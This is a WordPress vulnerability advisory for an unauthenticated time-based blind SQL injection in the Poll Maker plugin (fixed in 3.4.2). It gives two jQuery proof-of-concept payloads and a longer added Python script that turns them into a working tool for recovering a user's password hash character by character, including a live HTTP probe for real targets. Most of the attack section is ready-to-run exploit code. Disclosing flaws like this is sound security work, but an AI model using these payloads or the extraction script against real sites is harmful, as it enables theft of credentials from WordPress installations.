WordPress Plugin Vulnerabilities

Poll Maker < 3.4.2 - Unauthenticated Time Based SQL Injection

Description

The plugin allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. The query result is not disclosed in the response, but the injection can be exploited as a blind, time-based attack (a conditional SLEEP()) to exfiltrate data such as password hashes from the wp_users table.

Proof of Concept

The request requires a valid nonce, which an unauthenticated visitor can obtain by loading a page with a published poll and reading the value of the ays_finish_poll hidden input.

PoC 1: If a user with ID 1234 exists, the request takes around 10 seconds to complete; if not, it returns quickly.

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1234 AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})

PoC 2: This uses built-in MariaDB/MySQL functions to build the string literal without quote characters, which WordPress would otherwise escape (magic quotes). CHAR(36,80,36,66,37 USING utf8) evaluates to "$P$B%", a LIKE pattern matching any value that starts with "$P$B" (the prefix of the phpass hashes WordPress uses by default). If this request takes more than 10 seconds to execute, there is probably a user with ID 1 whose password hash starts with "$P$B".

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1 AND user_pass LIKE CHAR(36,80,36,66,37 USING utf8) AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})
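The two PoCs above each answer one yes/no question. The following script is an added example, not part of the original advisory and not the researcher's code: it generalises PoC 1 into an existence check and PoC 2 into a loop that recovers the whole user_pass hash one character at a time by timing a "does the hash start with <known prefix><candidate>?" probe. The request fields are the ones the jQuery PoCs send (jQuery serialises the answer array as answer[]). The target URL, nonce, poll id, table prefix and the constructed sample hash are placeholders and assumptions. One caveat the page does not mention: wp_users.user_pass has a case-insensitive collation by default, so the script uses LIKE BINARY rather than plain LIKE; otherwise 'a' and 'A' would be indistinguishable. The itoa64 alphabet and the 34-character length assume WordPress's default phpass hashes.

```python
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional

# itoa64 alphabet used by phpass ($P$) hashes. Assumption: the target stores
# WordPress's default phpass hashes (34 chars: "$P$B" + 8 salt + 22 digest).
HASH_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PHPASS_LEN = 34

Probe = Callable[[str], float]  # sends one 'answer' value, returns elapsed seconds


def as_char_expr(text: str) -> str:
    """Encode text as CHAR(n,n,... USING utf8) so the payload carries no quote
    characters (WordPress applies addslashes to request data, which would
    break a quoted '...' literal)."""
    return "CHAR(%s USING utf8)" % ",".join(str(b) for b in text.encode("utf-8"))


def build_answer(condition: str, delay: int = 10, table_prefix: str = "wp_") -> str:
    """Injected 'answer' value, same shape as the PoCs: closes the plugin's
    IN( list, UNIONs a 9-column row from the users table, sleeps only when
    `condition` holds, and re-opens IN ( so the plugin's own closing
    parenthesis keeps the SQL valid."""
    return (f"12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM {table_prefix}users "
            f"WHERE {condition} AND SLEEP({delay}) AND user_status IN (0")


def user_exists(probe: Probe, user_id: int, delay: int = 10) -> bool:
    """PoC 1 generalised: the request is slow only if the user row exists."""
    return probe(build_answer(f"ID={user_id}", delay)) >= delay


def extract_hash(probe: Probe, user_id: int = 1, delay: int = 10,
                 known: str = "$P$B", max_len: int = PHPASS_LEN) -> str:
    """PoC 2 generalised: grow the known prefix one character at a time.
    LIKE BINARY forces a byte-wise comparison; the column's default collation
    is case-insensitive, so plain LIKE cannot tell 'a' from 'A'."""
    recovered = known
    while len(recovered) < max_len:
        for c in HASH_ALPHABET:  # alphabet contains no LIKE wildcards (% or _)
            cond = f"ID={user_id} AND user_pass LIKE BINARY {as_char_expr(recovered + c + '%')}"
            if probe(build_answer(cond, delay)) >= delay:
                recovered += c
                break
        else:
            break  # no candidate matched: end of string, or a timing false negative
    return recovered


def http_probe(ajax_url: str, nonce: str, poll_id: str, delay: int = 10) -> Probe:
    """Live oracle (assumed URL/nonce/poll id): POST the fields the page's
    jQuery PoCs send and time the round trip."""
    def probe(answer: str) -> float:
        body = urllib.parse.urlencode({
            "answer[]": answer, "ays_finish_poll": nonce,
            "action": "ays_finish_poll", "poll_id": poll_id,
            "end_date": "2021-08-18 22:11:27",
        }).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(urllib.request.Request(ajax_url, data=body),
                                   timeout=delay * 3).read()
        except urllib.error.URLError:
            pass  # the response body is irrelevant; only the timing matters
        return time.monotonic() - start
    return probe


def fake_probe(db_hash: Optional[str], delay: int = 10) -> Probe:
    """Offline stand-in for the server, used by the demo: parses the injected
    condition and 'sleeps' (returns delay) only when it would be true for a
    constructed wp_users row with ID 1 and the given hash (None = no row)."""
    def probe(answer: str) -> float:
        uid = int(re.search(r"ID=(\d+)", answer).group(1))
        if uid != 1 or db_hash is None:
            return 0.05
        m = re.search(r"LIKE BINARY CHAR\(([\d,]+) USING utf8\)", answer)
        if m is None:
            return float(delay)  # PoC-1 style existence check, row exists
        pattern = bytes(int(n) for n in m.group(1).split(",")).decode()
        return float(delay) if db_hash.startswith(pattern.rstrip("%")) else 0.05
    return probe


if __name__ == "__main__":
    # Constructed sample row, not real data: a phpass-shaped hash for user ID 1.
    sample = "$P$BpX3Q9.ZgWqQfYk2t9qRb/e7d1mS6uH"
    probe = fake_probe(sample)
    print("user 1 exists:", user_exists(probe, 1))
    print("user 1234 exists:", user_exists(probe, 1234))
    print("recovered:", extract_hash(probe))
    # Against a live target: extract_hash(http_probe(AJAX_URL, NONCE, POLL_ID))
```

Each character costs up to 64 requests of about 10 seconds each, so a full hash takes at most a few hours; lowering the SLEEP value speeds this up at the cost of more timing false negatives on a noisy link, which is why the loop stops rather than guessing when no candidate matches.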

Affects Plugins

Fixed in 3.4.2

Classification

Type: SQLI (CWE-89)

Miscellaneous

Original Researcher: apple502j
Submitter: apple502j
Verified: Yes

Timeline

Publicly Published: 2021-09-13
Added: 2021-09-13
Last Updated: 2022-04-08
